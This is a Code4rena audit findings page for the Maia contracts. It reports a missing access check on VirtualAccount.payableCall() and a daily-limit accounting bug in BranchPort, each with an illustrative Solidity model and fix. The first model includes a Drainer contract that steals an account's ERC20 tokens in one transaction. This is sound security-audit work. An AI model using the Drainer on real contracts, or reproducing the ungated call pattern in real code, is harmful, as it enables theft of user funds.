Platform: Code4rena
Start Date: 22/09/2023
Pot Size: $100,000 USDC
Total HM: 15
Participants: 175
Period: 14 days
Judge: alcueca
Total Solo HM: 4
Id: 287
League: ETH
Rank: 82/175
Findings: 2
Award: $25.79
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: 0xTheC0der
Also found by: 0x180db, 0xDING99YA, 0xRstStn, 0xTiwa, 0xWaitress, 0xblackskull, 0xfuje, 3docSec, Aamir, Black_Box_DD, HChang26, Hama, Inspecktor, John_Femi, Jorgect, Kek, KingNFT, Kow, Limbooo, MIQUINHO, MrPotatoMagic, NoTechBG, Noro, Pessimistic, QiuhaoLi, SovaSlava, SpicyMeatball, T1MOH, TangYuanShen, Vagner, Viktor_Cortess, Yanchuan, _eperezok, alexweb3, alexxander, ast3ros, ayden, bin2chen, blutorque, btk, ciphermarco, ether_sky, gumgumzum, gztttt, hals, imare, its_basu, joaovwfreire, josephdara, klau5, kodyvim, ladboy233, marqymarq10, mert_eren, minhtrng, n1punp, nobody2018, oada, orion, peakbolt, peritoflores, perseverancesuccess, pfapostol, rvierdiiev, stuxy, tank, unsafesol, ustas, windhustler, zambody, zzzitron
0.1127 USDC - $0.11
https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112 https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L66
VirtualAccount.payableCall() (https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112) aggregates several low-level calls and requires each of them to succeed. The contract has a similar function for a single call, call() (https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L66). That function has the requiresApprovedCaller modifier, which checks that the calling address is approved.
VirtualAccount.payableCall() has no such access-check modifier. It is a public function, so any address, including an attacker, can call it.
The input parameters of the VirtualAccount.payableCall() function are PayableCall[] calldata calls.
struct PayableCall { address target; bytes callData; uint256 value; }
That is, an attacker controls the target, callData and value of each low-level call the account makes. This can lead to theft of funds held by the contract: the attacker makes the account send them to any target address.
Manual review
Restrict access to VirtualAccount.payableCall() with at least the requiresApprovedCaller modifier.
call/delegatecall
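As an added illustration (not code from the Maia repository or from the original report), the simplified account contract below reproduces the pattern described above: the PayableCall struct from the report, a gated call(), and an ungated payableCall(), followed by a hardened variant that applies the same requiresApprovedCaller modifier and a Drainer contract that shows the one-transaction token theft. The userAddress owner, the approvedCallers mapping, the msg.value accounting and the contract names are assumptions of the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Simplified illustration of the missing access check, not the Maia source.
// Assumptions: one `userAddress` owns the account; `approvedCallers` stands in for
// the project's router approval; tokens held by the account are ordinary ERC20s.
contract VulnerableAccount {
    struct Call { address target; bytes callData; }
    struct PayableCall { address target; bytes callData; uint256 value; }

    address public immutable userAddress;
    mapping(address => bool) public approvedCallers;

    error UnauthorizedCaller();
    error CallFailed();

    constructor(address user) { userAddress = user; }

    receive() external payable {}

    modifier requiresApprovedCaller() {
        if (msg.sender != userAddress && !approvedCallers[msg.sender]) revert UnauthorizedCaller();
        _;
    }

    function setApprovedCaller(address caller, bool ok) external requiresApprovedCaller {
        approvedCallers[caller] = ok;
    }

    // Gated path: only the owner or an approved caller may make the account call out.
    function call(Call[] calldata calls) external requiresApprovedCaller returns (bytes[] memory out) {
        out = new bytes[](calls.length);
        for (uint256 i = 0; i < calls.length; ++i) {
            bool ok;
            (ok, out[i]) = calls[i].target.call(calls[i].callData);
            if (!ok) revert CallFailed();
        }
    }

    // Ungated path: anyone can make this account call any target with any calldata.
    function payableCall(PayableCall[] calldata calls) public payable virtual returns (bytes[] memory out) {
        out = new bytes[](calls.length);
        uint256 spent;
        for (uint256 i = 0; i < calls.length; ++i) {
            spent += calls[i].value;
            bool ok;
            (ok, out[i]) = calls[i].target.call{value: calls[i].value}(calls[i].callData);
            if (!ok) revert CallFailed();
        }
        if (spent != msg.value) revert CallFailed(); // the caller must fund the ETH it forwards
    }
}

// Hardened variant: the modifier that guards call() also guards payableCall().
contract HardenedAccount is VulnerableAccount {
    constructor(address user) VulnerableAccount(user) {}

    function payableCall(PayableCall[] calldata calls)
        public payable override requiresApprovedCaller returns (bytes[] memory out)
    {
        return super.payableCall(calls);
    }
}

// Attacker: one transaction moves any ERC20 the account holds to the attacker.
contract Drainer {
    function drain(VulnerableAccount victim, address token, uint256 amount) external {
        VulnerableAccount.PayableCall[] memory calls = new VulnerableAccount.PayableCall[](1);
        calls[0] = VulnerableAccount.PayableCall({
            target: token,
            callData: abi.encodeWithSignature("transfer(address,uint256)", msg.sender, amount),
            value: 0
        });
        // Succeeds on VulnerableAccount; reverts with UnauthorizedCaller on HardenedAccount.
        victim.payableCall(calls);
    }
}
```

Deploying VulnerableAccount, giving it an ERC20 balance and calling Drainer.drain() moves the tokens to the attacker in one transaction; the same call with the victim argument cast from a HardenedAccount address reverts with UnauthorizedCaller. In this model the value field alone does not drain ETH, because the caller has to supply what it forwards, but any asset the account can move through a call, such as token transfers or approvals, is exposed.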
#0 - c4-pre-sort
2023-10-08T14:00:57Z
0xA5DF marked the issue as duplicate of #888
#1 - c4-pre-sort
2023-10-08T14:38:32Z
0xA5DF marked the issue as sufficient quality report
#2 - c4-judge
2023-10-26T11:28:27Z
alcueca marked the issue as satisfactory
🌟 Selected for report: MrPotatoMagic
Also found by: 0xAadi, 0xDING99YA, 0xDemon, 0xRstStn, 0xSmartContract, 0xStriker, 0xWaitress, 0xbrett8571, 0xfuje, 0xsagetony, 0xsurena, 33BYTEZZZ, 3docSec, 7ashraf, ABA, ABAIKUNANBAEV, Aamir, Audinarey, Bauchibred, Black_Box_DD, Daniel526, DanielArmstrong, DanielTan_MetaTrust, Dinesh11G, Eurovickk, Franklin, Inspecktor, John, Jorgect, Joshuajee, K42, Kek, Koolex, LokiThe5th, MIQUINHO, Myd, NoTechBG, QiuhaoLi, SanketKogekar, Sathish9098, Sentry, Soul22, SovaSlava, Stormreckson, Tendency, Topmark, Udsen, V1235816, Viktor_Cortess, Viraz, Yanchuan, ZdravkoHr, Zims, albahaca, albertwh1te, alexweb3, alexxander, ast3ros, audityourcontracts, bareli, bin2chen, bronze_pickaxe, c0pp3rscr3w3r, cartlex_, castle_chain, chaduke, debo, ether_sky, gumgumzum, imare, its_basu, jaraxxus, jasonxiale, josephdara, kodyvim, ladboy233, lanrebayode77, lsaudit, mert_eren, minhtrng, n1punp, nadin, niroh, nmirchev8, orion, peakbolt, perseverancesuccess, pfapostol, ptsanev, rvierdiiev, saneryee, shaflow2, te_aut, terrancrypt, twcctop, unsafesol, ustas, versiyonbir, windhustler, yongskiws, zhaojie, ziyou-
25.6785 USDC - $25.68
https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L144-L164 https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L167-L185
BranchPort.manage() (https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L144-L164) allows active Port Strategy addresses to withdraw assets. The function checks the strategy's daily limit.
BranchPort.replenishReserves() (https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L167-L185) allows an approved address to repay borrowed reserves.
When a strategy calls BranchPort.manage(), _amount is subtracted from its remaining daily limit: strategyDailyLimitRemaining[msg.sender][_token] = dailyLimit - _amount;
However, when BranchPort.replenishReserves() is called, the repaid amount is not added back to the remaining daily limit.
This is incorrect. If the strategy then wants to call BranchPort.manage() again for an amount that is within the daily limit once the funds repaid today are counted, the call fails, although formally the daily limit has not been exceeded.
Manual review
Add the repaid amount back to the remaining daily limit in BranchPort.replenishReserves().
Context
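As an added, self-contained model (not the BranchPort source), the contract below keeps the daily-limit bookkeeping the report describes and can be deployed in either mode: with creditRepayments false it behaves as described in the finding, with true it applies the suggested mitigation. The single-strategy, single-token accounting, the debt mapping, the per-day reset via block.timestamp and the cap at dailyLimit are assumptions of the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Simplified model of the daily-limit accounting, not the Maia BranchPort.
// Assumptions: bookkeeping only (no token transfers), one token, a limit that
// resets at the first use on a new day, and `approved` standing in for the
// port's strategy/approval checks.
contract LimitPort {
    uint256 public constant dailyLimit = 100 ether;
    bool public immutable creditRepayments; // false = behaviour in the finding, true = mitigation

    mapping(address => bool) public approved;
    mapping(address => uint256) public remaining;   // strategyDailyLimitRemaining in the report
    mapping(address => uint256) public lastUsedDay;
    mapping(address => uint256) public debt;        // reserves currently borrowed by the strategy

    error NotApproved();
    error ExceedsDailyLimit();

    constructor(bool _creditRepayments, address strategy) {
        creditRepayments = _creditRepayments;
        approved[strategy] = true;
    }

    function _today() internal view returns (uint256) { return block.timestamp / 1 days; }

    // Returns the remaining allowance, resetting it to dailyLimit on a new day.
    function _refresh(address s) internal returns (uint256) {
        if (lastUsedDay[s] != _today()) {
            lastUsedDay[s] = _today();
            remaining[s] = dailyLimit;
        }
        return remaining[s];
    }

    // Withdraw reserves against today's remaining allowance.
    function manage(uint256 amount) external {
        if (!approved[msg.sender]) revert NotApproved();
        uint256 left = _refresh(msg.sender);
        if (amount > left) revert ExceedsDailyLimit();
        remaining[msg.sender] = left - amount;
        debt[msg.sender] += amount;
    }

    // Repay reserves. Without crediting, the allowance stays reduced for the rest of the day.
    function replenishReserves(address strategy, uint256 amount) external {
        if (!approved[msg.sender]) revert NotApproved();
        debt[strategy] -= amount; // reverts on over-repayment (checked arithmetic)
        if (creditRepayments) {
            // Suggested mitigation: credit the repaid amount back, capped at dailyLimit.
            uint256 left = _refresh(strategy) + amount;
            remaining[strategy] = left > dailyLimit ? dailyLimit : left;
        }
    }
}
```

With dailyLimit of 100 ether: manage(60 ether) leaves 40 ether remaining; replenishReserves(strategy, 60 ether) then clears the debt; a second manage(50 ether) on the same day reverts with ExceedsDailyLimit when creditRepayments is false and succeeds when it is true, because the repayment restored remaining to 100 ether. The cap in the mitigation keeps a strategy's remaining allowance from ever exceeding dailyLimit, which could otherwise happen when debt borrowed on an earlier day is repaid after the allowance has already reset.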
#0 - c4-pre-sort
2023-10-08T06:01:08Z
0xA5DF marked the issue as primary issue
#1 - 0xA5DF
2023-10-08T06:01:18Z
Seems like intended design, but leaving open for sponsor to comment
#2 - c4-pre-sort
2023-10-08T14:46:45Z
0xA5DF marked the issue as sufficient quality report
#3 - c4-pre-sort
2023-10-12T16:14:17Z
0xA5DF marked the issue as duplicate of #694
#4 - c4-judge
2023-10-26T09:18:46Z
alcueca changed the severity to QA (Quality Assurance)
#5 - c4-judge
2023-10-26T09:19:08Z
alcueca marked the issue as grade-b